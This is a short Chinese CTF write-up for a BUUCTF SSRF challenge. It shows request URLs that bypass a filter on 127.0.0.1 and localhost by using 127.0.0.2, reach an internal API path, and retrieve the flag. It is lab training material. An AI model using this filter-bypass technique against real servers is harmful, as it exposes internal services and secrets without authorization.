Buuctf——[第三章 web进阶]Python里的SSRF

Posted 山川绿水

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Buuctf——[第三章 web进阶]Python里的SSRF相关的知识,希望对你有一定的参考价值。

[第三章 web进阶]Python里的SSRF


打开题目,题目让我们传入url,测试SSRF漏洞

http://8c1aeca9-09c9-4a1b-8559-b27044dfd8c2.node4.buuoj.cn:81/?url=http://www.baidu.com


发现可以访问百度,根据题目提示说

我们就访问容器内部的8000端口

http://8c1aeca9-09c9-4a1b-8559-b27044dfd8c2.node4.buuoj.cn:81/?url=http://127.0.0.1:8000


但是127.0.0.1被过滤了,尝试了localhost

http://8c1aeca9-09c9-4a1b-8559-b27044dfd8c2.node4.buuoj.cn:81/?url=http://localhost:8000


localhost同样被过滤了,尝试127.0.0.2

http://8c1aeca9-09c9-4a1b-8559-b27044dfd8c2.node4.buuoj.cn:81/?url=http://127.0.0.2:8000


发现可以被访问,那在继续加上路径即可

http://8c1aeca9-09c9-4a1b-8559-b27044dfd8c2.node4.buuoj.cn:81/?url=http://127.0.0.2:8000/api/internal/secret 


得到flag

n1book{1132e28b5433c878}

以上是关于Buuctf——[第三章 web进阶]Python里的SSRF的主要内容,如果未能解决你的问题,请参考以下文章

buuctf 刷题记录 [第二章 web进阶]SSRF Training

Buuctf N1BOOK [第二章 web进阶]文件上传

BuuCTF[第二章 web进阶]XSS闯关

BuuCTF Web Writeup 第三部分

Python进阶---面向对象第三弹(进阶篇)

Python | 蓝桥杯进阶第三卷——动态规划